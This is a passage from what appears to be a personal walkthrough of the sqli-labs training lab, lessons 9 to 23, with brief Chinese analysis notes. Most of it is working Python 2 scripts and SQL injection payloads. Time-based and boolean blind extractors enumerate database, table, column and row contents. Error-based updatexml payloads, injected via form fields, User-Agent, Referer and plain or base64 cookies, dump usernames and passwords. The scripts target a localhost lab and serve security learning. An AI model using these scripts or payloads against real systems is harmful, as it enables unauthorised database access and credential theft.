def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s')  and sleep(2)--+" %(i,tname,dname))   
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1))  and sleep(2)--+" %(tname,dname,cnum,i))        
        html = r.text
        if clock()-s < 1.5:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    s = clock()
                    r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d'  and sleep(2)--+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if clock()-s > 1.5:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(%s) FROM %s.%s)  and sleep(2)--+" %(i,cname,dname,tname))   
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))  and sleep(2)--+" %(cname, dname, tname, n, i))        
        html = r.text
        if clock()-s < 1.5:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    s = clock()
                    try:
                        r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d'  and sleep(2)--+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if clock()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day10-Less10

分析

同 9
只是单引号改双引号

代码

from requests import get
from time import *

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and length(database())=%d  and sleep(2)--+" %i)
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            s = clock()
            r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR(database(),%d,1))='%d' and sleep(2)--+" %(i+1,n))
            html = r.text
            if clock()-s > 1.5:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s')  and sleep(2)--+" %(i,name))
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1))  and sleep(2)--+" %(name,n,i))        
        html = r.text
        if clock()-s < 1.5:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                s = clock()
                r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d'  and sleep(2)--+" %(DBName,no,i+1,n))
                html = r.text
                if clock()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s')  and sleep(2)--+" %(i,tname,dname))   
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1))  and sleep(2)--+" %(tname,dname,cnum,i))        
        html = r.text
        if clock()-s < 1.5:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    s = clock()
                    r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d'  and sleep(2)--+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if clock()-s > 1.5:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and %d=(SELECT count(%s) FROM %s.%s)  and sleep(2)--+" %(i,cname,dname,tname))   
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))  and sleep(2)--+" %(cname, dname, tname, n, i))        
        html = r.text
        if clock()-s < 1.5:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    s = clock()
                    try:
                        r = get("http://localhost/sqllab/Less-10/?id=1\" and ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d'  and sleep(2)--+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if clock()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data

s = clock()  
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'
print '[!]Timer', round(clock()-s,2),'s'```

## Day11-Less11
### 分析

select XX,XX,XX from XX where username = '\(uname' and password = '\)passwd'
1' group by 3#
报错

select XX,XX from XX where username = '\(uname' and password = '\)passwd'

Username：' or 1 limit 1,2#
Password：(任意)

## Day12-Less12
### 分析

select XX,XX,XX from XX where username = ("\(uname") and password = ("\)passwd")
1") group by 3#
报错

select XX,XX from XX where username = ("\(uname") and password = ("\)passwd")

Username：") or 1 limit 1,2#
Password：(任意)

## Day13-Less13
### 分析

select XX,XX from XX where username = ('\(uname') and password = ('\)passwd')

') union select 1,2 from INFORMATION_SCHEMA.tables where updatexml(1,concat('',(select username from security.users limit 0,1),'',(select password from security.users limit 0,1)),1) #

## Day14-Less14
### 分析

select XX,XX from XX where username = "\(uname" and password = "\)passwd"

" union select 1,2 from INFORMATION_SCHEMA.tables where updatexml(1,concat('',(select username from security.users limit 0,1),'',(select password from security.users limit 0,1)),1) #

## Day15-Less15
### 分析

select XX,XX from XX where username = '\(uname' and password = '\)passwd'
1' or 1 #

### 代码
```python
from requests import post

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        payload = {'uname': "0' or length(database())=%d#" %i, 'passwd': ''}
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' in html:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            payload = {'uname': "0' or ascii(SUBSTR(database(),%d,1))='%d'#" %(i+1,n), 'passwd': ''}
            r = post("http://localhost/sqllab/Less-15/",data=payload)
            html = r.text
            if 'flag.jpg' in html:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        payload = {'uname': "' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') #" %(i,name), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' in html:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        payload = {'uname': "' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) #" %(name,n,i), 'passwd': ''}        
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' not in html:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                payload = {'uname': "' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' #" %(DBName,no,i+1,n), 'passwd': ''}                        
                r = post("http://localhost/sqllab/Less-15/",data=payload)
                html = r.text
                if 'flag.jpg' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        payload = {'uname': "' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') #" %(i,tname,dname), 'passwd': ''}  
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' in html:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        payload = {'uname': "' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) #" %(tname,dname,cnum,i), 'passwd': ''}          
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' not in html:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    payload = {'uname': "' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' #" %(tname,DBName,cnum,i+1,n), 'passwd': ''}          
                    r = post("http://localhost/sqllab/Less-15/",data=payload)
                    html = r.text
                    if 'flag.jpg' in html:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        payload = {'uname': "' or %d=(SELECT count(%s) FROM %s.%s) #" %(i,cname,dname,tname), 'passwd': ''}          
        r = post("http://localhost/sqllab/Less-15/?id=",data=payload)
        html = r.text
        if 'flag.jpg' in html:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        payload = {'uname': "' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) #" %(cname, dname, tname, n, i), 'passwd': ''}        
        r = post("http://localhost/sqllab/Less-15/",data=payload)
        html = r.text
        if 'flag.jpg' not in html:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        payload = {'uname': "' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' #" %(cname, dname, tname, no,i+1,n), 'passwd': ''}
                        r = post("http://localhost/sqllab/Less-15/",data=payload)
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'flag.jpg' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day16-Less16

分析

select XX,XX from XX where username = ("$uname") and password = ("$passwd")

1") or 1#

1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where length(database())=8#
1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR(database(),1,1))=115#

代码

from requests import post
from time import *

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        s = clock()
        payload = {'uname': '1") or 1 union select 1,sleep(2) from (select 1,2) as Troy where length(database())=%d#' %i, 'passwd': ''}
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s > 1.5:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            s = clock()
            payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR(database(),%d,1))='%d'#" %(i+1,n), 'passwd': ''}
            r = post("http://localhost/sqllab/Less-16/",data=payload)

            if clock()-s > 1.5:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') #" %(i,name), 'passwd': ''}
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s > 1.5:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) #" %(name,n,i), 'passwd': ''}        
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s < 1.5:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                s = clock()
                payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' #" %(DBName,no,i+1,n), 'passwd': ''}                        
                r = post("http://localhost/sqllab/Less-16/",data=payload)

                if clock()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') #" %(i,tname,dname), 'passwd': ''}  
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s > 1.5:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) #" %(tname,dname,cnum,i), 'passwd': ''}          
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s < 1.5:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    s = clock()
                    payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' #" %(tname,DBName,cnum,i+1,n), 'passwd': ''}          
                    r = post("http://localhost/sqllab/Less-16/",data=payload)

                    if clock()-s > 1.5:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where %d=(SELECT count(%s) FROM %s.%s) #" %(i,cname,dname,tname), 'passwd': ''}          
        r = post("http://localhost/sqllab/Less-16/?id=",data=payload)

        if clock()-s > 1.5:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        s = clock()
        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) #" %(cname, dname, tname, n, i), 'passwd': ''}        
        r = post("http://localhost/sqllab/Less-16/",data=payload)

        if clock()-s < 1.5:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    s = clock()
                    try:
                        payload = {'uname': "1\") or 1 union select 1,sleep(2) from (select 1,2) as Troy where ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' #" %(cname, dname, tname, no,i+1,n), 'passwd': ''}
                        r = post("http://localhost/sqllab/Less-16/",data=payload)
                        break
                    except:
                        print 'Relaxing...'

                if clock()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data

s = clock()                     
DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'
print '[!]Timer', round(clock()-s,2),'s'```

## Day17-Less17
### 分析

UPDATE table SET password = '' WHERE username = 'Dhakkan'

基于报错注入：
UPDATE users SET password = ''+(select updatexml(1,concat('',(select from (select username from security.users limit 0,1)x),'',(select from (select password from security.users limit 0,1)x)),1))+'' WHERE username = 'Dhakkan';

(通过子查询，使 select 的表更换一个名称，解决在同一语句中不能先 select 出同一表中的某些值，再 update 这个表的限制)
UPDATE users SET password = ''+(select 1 from (select 1) as a where updatexml(1,concat('*',(select username from security.users as x limit 0,1)),1))+'' WHERE username = 'Dhakkan';
会报错：
即"ERROR 1093 (HY000): You can't specify target table 'users' for update in FROM clause"

盲注也行：
基于时间
select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c);
select(select if(length(database())=8,sleep(1),'1') From ((select 1 as a) union (select 2 as b)) as c);

或者基于正则

select(select 'a' REGEXP (case when length(database())=8 then '.' else '' end) From ((select 1 as a) union (select 2 as b)) as c);

即
UPDATE users SET password = ''+(select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c))+'' WHERE username = 'Dhakkan';
或者
UPDATE users SET password = ''+(select(select 'a' REGEXP (case when length(database())=8 then '.' else '' end) From ((select 1 as a) union (select 2 as b)) as c))+'' WHERE username = 'Dhakkan';

UPDATE users SET password = ''+(select(select case when length(database())=8 then sleep(1) else '1' end From (select 1,2)))+'' WHERE username = 'Dhakkan';

from requests import *
pdata = {
'uname': "Dhakkan",
'passwd':"'+(select(select case when length(database())=8 then sleep(1) else '1' end From ((select 1 as a) union (select 2 as b)) as c))+'"
}
print post('http://localhost/sqllab/Less-17/', data = pdata).text

## Day18-Less18
### 分析

想做出这题，先得知道一组用户名与密码...
假设我们知道 Dhakkan 的密码为 dumbo。emmmmm 然后继续做

('','','')

x'
::1', 'Dhakkan')
('x'',' ::1','')

x' or 1
', '::1', 'Dhakkan')
('x' or 1 ','','')

('
')#
','','')
Column count doesn't match value count at row 1
(由于一个 SQL 执行语句，前面的字段与后面值的数目不一致)
INSERT INTO("useragent","ip","username") VALUES('','::1','Dhakkan');
->
INSERT INTO("useragent","ip","username") VALUES('')#','::1','Dhakkan');

('') or 1#','','')
or 1#', '::1', 'Dhakkan')
INSERT INTO("useragent","ip","username") VALUES('') or 1#','::1','Dhakkan');

INSERT INTO("useragent","ip","username") VALUES('
1' and (select sleep(1) from (select 1,2)x where length(database())=7) or '
','::1','Dhakkan');

us 注入：
时间
1' and (select sleep(1) from (select 1,2)x where length(database())=7) or '

报错
1' and (select (updatexml(1,concat('',(select username from security.users limit 0,1),'',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '

### 代码
```python
from requests import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}
headers = {
'User-Agent': "1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '",
}

print post('http://localhost/sqllab/Less-18/', headers = headers,data=pdata).text

Day19-Less19

分析

想做出这题，先得知道一组用户名与密码...
假设我们知道 Dhakkan 的密码为 dumbo。emmmmm 然后继续做

('','')

x'
::1')
('x'','   ::1')

x' or 1
', '::1')
('x' or 1    ','::1')

('
')#
','','')
Column count doesn't match value count at row 1
(由于一个 SQL 执行语句，前面的字段与后面值的数目不一致)
INSERT INTO("referer","ip") VALUES('','::1');
->
INSERT INTO("referer","ip") VALUES('')#','::1');

('') or 1#','','')
or 1#', '::1')
INSERT INTO("referer","ip") VALUES('') or 1#','::1');


INSERT INTO("referer","ip") VALUES('
1' and (select sleep(1) from (select 1,2)x  where length(database())=7) or '
','::1');


us 注入：
时间
1' and (select sleep(1) from (select 1,2)x  where length(database())=7) or '

报错
1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '

代码

from requests import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}
headers = {
'referer': "1' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '"
}

print post('http://localhost/sqllab/Less-19/', headers = headers,data=pdata).text

Day20-Less20

分析

select XX,XX from XXXX where username='$cookie' LIMIT 0,1
dhakkan'
'dhakkan'' LIMIT 0,1

select XX,XX from XXXX where username='
' or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#
' LIMIT 0,1

比较简单

代码

from requests import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}
u = "uname=' and (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#"
headers = {
'cookie': u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

print get('http://localhost/sqllab/Less-20/', headers = headers).text

Day21-Less21

分析

b64encode("
troy'
")
->
'troy'') LIMIT 0,1

troy')

') or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#

代码

from requests import *
from base64 import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}

u = b64encode("') or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
headers = {
'cookie': "uname="+u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

print get('http://localhost/sqllab/Less-21/', headers = headers).text

Day22-Less22

分析

u = b64encode("\" or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
和 21 一样，只不过单引号改双引号

代码

from requests import *
from base64 import *

pdata = {
'uname':'Dhakkan',
'passwd':'dumbo'
}

u = b64encode("\" or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)#")
headers = {
'cookie': "uname="+u+'; UM_distinctid=15db68de5331e6-0fcf1c23c85ccd-12646f4a-144000-15db68de534253; CNZZDATA1262026580=1159390564-1502004645-%7C1502024878; username-localhost-8888="2|1:0|10:1510795018|23:username-localhost-8888|44:NmRiN2Q4MWE2OTZhNGU3NDhmMjNhZWRkYjQ5YmZhOTQ=|959c6f4a2d8a84576742b1132668877b661cd90abae81fc711d382026152fcb0"; Pycharm-8eae623b=4803f404-6e14-4372-b6e4-df57d656fdb8'
}

print get('http://localhost/sqllab/Less-22/', headers = headers).text

Day23-Less23

分析

select *,* from XX where id = '$id' LIMIT 0,1

1'-- -
->
' LIMIT 0,1
